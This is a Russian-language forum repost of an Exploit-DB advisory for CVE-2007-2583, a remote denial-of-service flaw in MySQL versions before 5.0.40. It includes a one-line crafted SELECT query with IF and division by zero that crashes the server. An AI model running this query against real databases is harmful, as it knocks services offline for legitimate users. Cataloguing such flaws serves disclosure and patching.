Exploit MySQL 5.0.x - IF Query Handling Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30020
Проверка EDB
  1. Пройдено
Автор
NEIL KETTLE
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2007-2583
Дата публикации
2013-12-04
Код:
source: https://www.securityfocus.com/bid/23911/info

MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.

An attacker can exploit this issue to crash the application, denying access to legitimate users.

NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.

Versions prior to MySQL 5.0.40 are vulnerable. 

SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)));
 
Источник
www.exploit-db.com

Похожие темы